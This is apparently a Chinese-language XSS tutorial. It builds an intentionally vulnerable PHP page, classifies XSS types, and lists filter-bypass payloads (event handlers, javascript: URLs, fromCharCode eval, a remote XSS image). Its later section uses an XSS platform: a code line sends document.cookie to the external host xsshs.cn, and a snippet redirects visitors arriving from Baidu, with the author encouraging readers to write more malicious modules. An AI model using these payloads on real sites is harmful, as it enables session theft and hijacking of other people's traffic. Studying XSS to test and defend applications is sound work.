1.实验环境搭建
phpstudy
网站根目录(jsAttack.php)源码:
<?php
echo 'hello';
echo $_GET['name'];
setcookie("TestCookie", "test");
?>
网站功能:根据用户输入的name,返回一个hello +用户输入。
2.xss漏洞成因
后台未对用户输入进行检查,直接把用户输入返回至前端。导致javascript代码在客户端任意执行。
从xss的成因可以看到,xss攻击对象是客户端(恶意代码是在客户端执行的)。并且理论上前端javascript可以实现的功能,xss都可以在客户端实现,像获取cookie,记录键盘等。
3.xss分类
结合图5.1.1查看
3.1反射型
经过后端,不经过数据库
3.2存储型
经过后端,经过数据库
3.3dom型
不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom - xss是通过url传入参数去控制触发的。
小结:两点区分三类。1.是否经过后端。2.是框里,还是url里的参数。第一类和第三类其实差不不大(个人觉得)。
4.XSS检测及绕过
(1)后台未对输入进行任何处理
检测代码
"><script>alert("xss")</script>
(2)后台对输入进行了过滤,含有script关键字时,替换成空。
(这条代码的意思是,把oldVar里的"script"替换成"")
后台过滤代码:$newVar = preg_replace("/script/", "", $oldVar);
检测手段:
<scrscriptipt>alert("XSS")</scrscriptipt>
检测结果:
(3)进行了过滤,当含有script关键字时,直接返回空
后台过滤代码:
keywords="script";
if(preg_match("/$keywords/i",$data)){
return;
}else{http://192.168.7.119:8000/zc-detail/12/#user-profile-info
return $data;
}
(4)针对script关键字的过滤,有以下绕过姿势
1.JavaScript 事件
<div οnmοuseenter="alert('xss')">
<div onclick ="alert('xss')">
<button type="button" onclick="alert('xss')>Click Me!</button>
<input type = "button" value = "clickme" onclick="alert('click me');" />
<img src="images/logo.png" onerror="alert('xss')"/>
检测结果
2.行内样式(Inlinestyle)
<div style="color: expression(alert('XSS'))">
<div style="color: '<'; color: expression(alert('XSS'))">
经过测试,当ie开启兼容性设置时,这种方法才有效。不具备普遍性。
3.Javascript URL和html字符编码
<a href="javascript:alert(1)">link</a>
<a href="javascript:alert('xss')">link</a>
检测结果
绕过原理:
当浏览器接受到一份HTML代码后,会对标签之间(<p>xxx</p>等,<script>除外)、标签的属性中(<a href='xxxx'>)进行实体字符(其实就是html编码)解码变为相应的字符。利用这个,由可以进行一次绕过。
注意:如果请求的参数是在url中,需要先对测试代码进行一个url编码
(5)空格/回车/Tab绕过(测试一下,是无法绕过的,不过好多博客上都写可以绕过javascript关键字。)
<img src= "java script:alert('xss');" width=100>
(6)绕过magic_quotes_gpc(针对',",\关键字的绕过)
magic_quotes_gpc=ON是php中的安全设置,开启后会把一些特殊字符进行轮换,比如’(单引号)转换为\’,”(双引号)转换为\”,\转换为\
6.1可以充分利用字符编码
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88,83, 83, 34, 41, 59))</script>
6.2利用远程xss图片
<img sRC=https://xsshs.cn/IGCz/xss.jpg>
如何生成这种xss图片的原理,参考链接
图片xss的利用方法
不想了解原理,可以直接通过xss平台生成。
绕过小结:不断测试,猜测后台对哪些关键字进行了过滤处理,和处理方式。如果后台只对script,',",\进行了过滤处理,理论上是可以成功绕过的。至于后台对<,>进行了过滤处理,怎么绕过我暂时不清楚,欢迎大家脑洞。用以下代码测试,如果没有问题,基本上就不存在着xss(最后一条代码的src指向一个包含js脚本的图片)
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88,83, 83, 34, 41, 59))</script>
<a href="javascript:alert(1)">link</a>
<img src="images/logo.png" onerror="alert('xss')"/>
<img sRC=https://xsshs.cn/IGCz/xss.jpg>
5.XSS平台
5.1xss攻击过程
下图是xss攻击的全过程图。
可以分为三个部分:攻击者,存在xss漏洞的web服务端,被攻击用户。
xss平台的用处当然不只是简单的收集数据,它还可以帮助攻击者生成各种功能的恶意js代码,如记录键盘,定位,获取页面源码等功能。由于各种功能的恶意代码过长,一般是通过js远程引入(javascript是可以远程引入js代码并执行的)
如下图,xss平台提供一些常用的恶意js脚本(公共模块),同时你也可以编写自己的恶意模块(我的模块)。使用xss的公共模块很简单,新建一个项目,之后会有一个如何使用(就是把那段生成的代码,贴在有xss的地方),傻瓜式操作。
5.2窃取cookie
这里只测了一下基本功能窃取cookie,成功了。
关键代码
'https://xsshs.cn/xss.php?do=keepsession&id=IGCz&url='+escape(document.location)+'&cookie='+escape(document.cookie)
这段代码的意思是将document.cookie,以参数cookie提交到xss平台。
5.3劫持搜索引擎
搜索引擎劫持我试着弄了一下,成功劫持跳转(原来是抓包改referrer,但是没有跳转,原因暂时不清楚。之后是在本地做了一个baidu.php的页面做跳转才成功)。模块代码很简单,如下:
var slyar=document.referrer;if(slyar.indexOf("baidu")>0)self.location="https://xsshs.cn";
这句话的意思是,如果是从百度跳转过来的,就重定向到我这个xss平台(从百度搜索引擎跳转到的网页,referrer 一般都是类似这种格式的https://eclick.baidu.com/fp.htm?br=2&fp=92D9C905D35768DCA250B8B72860337D&fp2=FC91)
所以当用户是从百度的搜索引擎跳转过来的时候,会直接重定向到别的而已网站。换句话说,花钱买的百度搜索引擎排名,结果跳转到的却是别人的网站。
xss平台总结:理论上,js代码在前端能实现的功能,xss攻击都可以实现,比如页面跳转,记录键盘等。像搜索引擎劫持就是一个利用xss很好的例子。所以可以尽情发挥自己脑洞,编写一些自己的模块,漏洞的利用也是一个很好玩的东西。ps:xss蠕虫,有兴趣了解一下。
